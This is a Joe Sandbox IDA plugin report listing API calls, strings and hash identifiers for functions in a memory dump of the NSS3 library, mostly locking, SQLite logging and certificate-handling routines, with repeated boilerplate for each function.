Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]Yl
API String ID: 3150690610-3118362216
Opcode ID: ec2be4197559d558017c166d68eb3623a4e6f01b4c8dffe6387e00f7c058e451
Instruction ID: 2759a4a6c81245bcfa6b04073dd79606bc4d0c944e94175c1717b38b15495767
Opcode Fuzzy Hash: ec2be4197559d558017c166d68eb3623a4e6f01b4c8dffe6387e00f7c058e451
Instruction Fuzzy Hash: 8721D3B1D002049FDB10AF68DC41AEEBBB4EF59318F940129E90AA7701EB31A958CBD5

Function 6C558CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C56124D,00000001), ref: 6C558D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C56124D,00000001), ref: 6C558D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C56124D,00000001), ref: 6C558D73
PR_Unlock.NSS3(?,?,?,?,?,6C56124D,00000001), ref: 6C558D8C

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C56124D,00000001), ref: 6C558DBA

Strings

KRAM, xrefs: 6C558D3E
KRAM, xrefs: 6C558CF9

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: a6968f655a8fec50de3c001c5c9f9adc77e92031a8a3449dfa38f7e0ee05940c
Instruction ID: 57d661ac23934f69b1a2d011721d9ad0f6a4dfe19f2dd05ded3a25a00b58a802
Opcode Fuzzy Hash: a6968f655a8fec50de3c001c5c9f9adc77e92031a8a3449dfa38f7e0ee05940c
Instruction Fuzzy Hash: 92219FB1A54601CFCB00EF79C98466ABBF0FF85308F55896BD89987701EB34D851CB92

Function 6C650ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C650EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C650EFA

Part of subcall function 6C53AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C53AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C650F2B

Strings

Aborting, xrefs: 6C650EB3
Assertion failure: %s, at %s:%d, xrefs: 6C650ED9, 6C650EE5, 6C650F06, 6C650F0B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 3edc645243e8e66e880b55cb3567bb758d6dbfe4b2ba739a39845e0d9d2df757
Instruction ID: cbfd8fd9a1a18c6220c19936ea95a6ef95b2571ea1d2efcb13b2a6ed78d56865
Opcode Fuzzy Hash: 3edc645243e8e66e880b55cb3567bb758d6dbfe4b2ba739a39845e0d9d2df757
Instruction Fuzzy Hash: AC01A1B5900114BBDF016F55DC85C9B3B6CDF46368F504014FD0A97611D631E92496BA

Function 6C631C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Sl,?,?,6C534E1D), ref: 6C631C8A
sqlite3_free.NSS3(00000000), ref: 6C631CB6

Strings

a CHECK constraint, xrefs: 6C631C76, 6C631C81
an index, xrefs: 6C631C67
w=Sl, xrefs: 6C631C44
non-deterministic use of %s() in %s, xrefs: 6C631C85
a generated column, xrefs: 6C631C6C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Sl
API String ID: 1840970956-2050964874
Opcode ID: 583ccdd18d31e716ec00c32e40d90c06ea265302bb0ae6f98b3ef542a9d976f6
Instruction ID: c888fcaf38e4de72ef9bfe8eaade5b9c3274b00b863043732e3bb895146c9b1e
Opcode Fuzzy Hash: 583ccdd18d31e716ec00c32e40d90c06ea265302bb0ae6f98b3ef542a9d976f6
Instruction Fuzzy Hash: 610124B1A001405BD710AE28D802DB173E5EFC634CB15086DE8499BB52EB22E856C7A5

Function 6C614D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C614DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C614DE0

Strings

%s at line %d of [%.10s], xrefs: 6C614DDA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C614DCB
API call with %s database connection pointer, xrefs: 6C614DBD
misuse, xrefs: 6C614DD5
invalid, xrefs: 6C614DB8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: f0c52f9d5550dfcec88b9a5700c36c59c8e20d6e502017896679c8dbb4e46828
Instruction ID: adf334412f1998ee9707b81b63da3690bf2f1b96a2a804896fdbc085aa65f63d
Opcode Fuzzy Hash: f0c52f9d5550dfcec88b9a5700c36c59c8e20d6e502017896679c8dbb4e46828
Instruction Fuzzy Hash: A5F0E911F285646BDF104119DC21FE637D55F0131EF560DB0FD146BEA2D246985086ED

Function 6C614DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C614E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C614E4D

Strings

%s at line %d of [%.10s], xrefs: 6C614E47
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C614E38
API call with %s database connection pointer, xrefs: 6C614E2A
misuse, xrefs: 6C614E42
invalid, xrefs: 6C614E25

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: add8f75b141ba26897aa11559eb8bb013cbc0c62a07a0a83319a4de63563bfff
Instruction ID: b842abf41fae852e33be064c25c314667b113aecc97fde40e37cbe3e60fda5e2
Opcode Fuzzy Hash: add8f75b141ba26897aa11559eb8bb013cbc0c62a07a0a83319a4de63563bfff
Instruction Fuzzy Hash: 4FF02711F4C9282BEA204329DC10FE73B965B0172FF0948A1EA1867E92D646986346FD

Function 6C549FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C54A086
EnterCriticalSection.KERNEL32(?), ref: 6C54A09B
PR_Unlock.NSS3(?), ref: 6C54A0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C54A0E9
TlsGetValue.KERNEL32 ref: 6C54A11B
EnterCriticalSection.KERNEL32(?), ref: 6C54A12F
PR_Unlock.NSS3(?), ref: 6C54A148

Part of subcall function 6C561A40: PR_Now.NSS3(?,00000000,6C5428AD,00000000,?,6C55F09A,00000000,6C5428AD,6C5493B0,?,6C5493B0,6C5428AD,00000000,?,00000000), ref: 6C561A65

Part of subcall function 6C561940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C564126,?), ref: 6C561966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C54A1A3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 89d3d6eb12786a1dddecd9dffb8ef0b0f1ae0daab6820a002de4d790ea99f257
Instruction ID: f86fe96b581cb1d900a1961e60b7b8b5c3e1f4fc238a2ff1dd27fbc11fc72918
Opcode Fuzzy Hash: 89d3d6eb12786a1dddecd9dffb8ef0b0f1ae0daab6820a002de4d790ea99f257
Instruction Fuzzy Hash: CA51F4B1A00200DBEB509F7ADC84AAB77B8AFD6309F148539EC1E97701EB30E945C691

Function 6C580C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C581444,?,00000001,?,00000000,00000000,?,?,6C581444,?,?,00000000,?,?), ref: 6C580CB3

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C581444,?,00000001,?,00000000,00000000,?,?,6C581444,?), ref: 6C580DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C581444,?,00000001,?,00000000,00000000,?,?,6C581444,?), ref: 6C580DEC

Part of subcall function 6C5A0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C542AF5,?,?,?,?,?,6C540A1B,00000000), ref: 6C5A0F1A
Part of subcall function 6C5A0F10: malloc.MOZGLUE(00000001), ref: 6C5A0F30
Part of subcall function 6C5A0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5A0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C581444,?,00000001,?,00000000,00000000,?), ref: 6C580DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C581444,?,00000001,?,00000000), ref: 6C580E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C581444,?,00000001,?,00000000,00000000,?), ref: 6C580E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C581444,?,00000001,?,00000000,00000000,?,?,6C581444,?,?,00000000), ref: 6C580E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C581444,?,00000001,?,00000000,00000000,?), ref: 6C580E79

Part of subcall function 6C591560: TlsGetValue.KERNEL32(00000000,?,6C560844,?), ref: 6C59157A
Part of subcall function 6C591560: EnterCriticalSection.KERNEL32(?,?,?,6C560844,?), ref: 6C59158F
Part of subcall function 6C591560: PR_Unlock.NSS3(?,?,?,?,6C560844,?), ref: 6C5915B2

Part of subcall function 6C55B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C561397,00000000,?,6C55CF93,5B5F5EC0,00000000,?,6C561397,?), ref: 6C55B1CB
Part of subcall function 6C55B1A0: free.MOZGLUE(5B5F5EC0,?,6C55CF93,5B5F5EC0,00000000,?,6C561397,?), ref: 6C55B1D2

Part of subcall function 6C5589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5588AE,-00000008), ref: 6C558A04
Part of subcall function 6C5589E0: EnterCriticalSection.KERNEL32(?), ref: 6C558A15
Part of subcall function 6C5589E0: memset.VCRUNTIME140(6C5588AE,00000000,00000132), ref: 6C558A27
Part of subcall function 6C5589E0: PR_Unlock.NSS3(?), ref: 6C558A35

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 4ab4dadaa5b4cf0fc8bfbf8c7af48b1238270024e72d578c48da8850ce2f4353
Instruction ID: 46b8bff4ee0afac36bd0691c718ce5103172c4cbe7d3429a357243f5770f785e
Opcode Fuzzy Hash: 4ab4dadaa5b4cf0fc8bfbf8c7af48b1238270024e72d578c48da8850ce2f4353
Instruction Fuzzy Hash: 0951B9F5E022109FEB009F65DC81ABF37A89F8521CF550465EC159BB12FB31ED1586A2

Function 6C536E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C536ED8
sqlite3_value_text.NSS3(?,?), ref: 6C536EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C536FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C536FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C536FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C537010
sqlite3_value_blob.NSS3(?,?), ref: 6C53701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C537052

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: a08d45dd676411615264de766f9ac570980249bf8b804adf29933fa9a8d91be8
Instruction ID: 95352d0ee86939e4aad7bed46b41ece8a36837b978c44741628001ffa40b08fe
Opcode Fuzzy Hash: a08d45dd676411615264de766f9ac570980249bf8b804adf29933fa9a8d91be8
Instruction Fuzzy Hash: A161C2B1E1422ACBDB00CBA4CD507EEB7B2BF85308F285168D418AB755FB359C15CBA5

Function 6C5A8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C5A7313), ref: 6C5A8FBB

Part of subcall function 6C5A07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C548298,?,?,?,6C53FCE5,?), ref: 6C5A07BF
Part of subcall function 6C5A07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5A07E6
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A081B
Part of subcall function 6C5A07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A0825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C5A7313), ref: 6C5A9012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C5A7313), ref: 6C5A903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C5A7313), ref: 6C5A909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C5A7313), ref: 6C5A90DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C5A7313), ref: 6C5A90F1

Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A10F3
Part of subcall function 6C5A10C0: EnterCriticalSection.KERNEL32(?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A110C
Part of subcall function 6C5A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1141
Part of subcall function 6C5A10C0: PR_Unlock.NSS3(?,?,?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A1182
Part of subcall function 6C5A10C0: TlsGetValue.KERNEL32(?,6C548802,00000000,00000008,?,6C53EF74,00000000), ref: 6C5A119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C5A7313), ref: 6C5A906B

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C5A7313), ref: 6C5A9128

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: afa5549663317cfcf20691bf4ba320de79920791824eb3c74376a3f26b202b11
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: DC519175A002218FEB10DFABDC44B2AB3F5BF84358F154429D925D7B61EB32E806CB91

Function 6C559C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C558850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C560715), ref: 6C558859
Part of subcall function 6C558850: PR_NewLock.NSS3 ref: 6C558874
Part of subcall function 6C558850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C55888D

PR_NewLock.NSS3 ref: 6C559CAD

Part of subcall function 6C6098D0: calloc.MOZGLUE(00000001,00000084,6C530936,00000001,?,6C53102C), ref: 6C6098E5

Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307AD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307CD
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4C204A), ref: 6C5307D6
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4C204A), ref: 6C5307E4
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,6C4C204A), ref: 6C530864
Part of subcall function 6C5307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C530880
Part of subcall function 6C5307A0: TlsSetValue.KERNEL32(00000000,?,?,6C4C204A), ref: 6C5308CB
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308D7
Part of subcall function 6C5307A0: TlsGetValue.KERNEL32(?,?,6C4C204A), ref: 6C5308FB

TlsGetValue.KERNEL32 ref: 6C559CE8
EnterCriticalSection.KERNEL32(?,?,6C55ECEC,6C562FCD,00000000,?,6C562FCD,?), ref: 6C559D01
TlsGetValue.KERNEL32(?,?,?,6C55ECEC,6C562FCD,00000000,?,6C562FCD,?), ref: 6C559D38
EnterCriticalSection.KERNEL32(?,?,6C55ECEC,6C562FCD,00000000,?,6C562FCD,?), ref: 6C559D4D
PR_Unlock.NSS3 ref: 6C559D70
PR_Unlock.NSS3 ref: 6C559DC3
PR_NewLock.NSS3 ref: 6C559DDD

Part of subcall function 6C5588D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C560725,00000000,00000058), ref: 6C558906
Part of subcall function 6C5588D0: EnterCriticalSection.KERNEL32(?), ref: 6C55891A
Part of subcall function 6C5588D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C55894A
Part of subcall function 6C5588D0: calloc.MOZGLUE(00000001,6C56072D,00000000,00000000,00000000,?,6C560725,00000000,00000058), ref: 6C558959
Part of subcall function 6C5588D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C558993
Part of subcall function 6C5588D0: PR_Unlock.NSS3(?), ref: 6C5589AF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: f12bc3ca6418274d17fa5518af06b3de69c0447ad60f4eacbd7d7a35ed727c04
Instruction ID: 69675fbde46487a4a4b779c4b4c603eff6de10917b78ecdc9069415870ddc00a
Opcode Fuzzy Hash: f12bc3ca6418274d17fa5518af06b3de69c0447ad60f4eacbd7d7a35ed727c04
Instruction Fuzzy Hash: F35191B0A00705DFDB00EF69C98466EBBF0BF44348F55892AD8989BB10EB34E855CBD1

Function 6C659EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C659EC0
EnterCriticalSection.KERNEL32(?), ref: 6C659EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C659F73
EnterCriticalSection.KERNEL32(?), ref: 6C659FA5
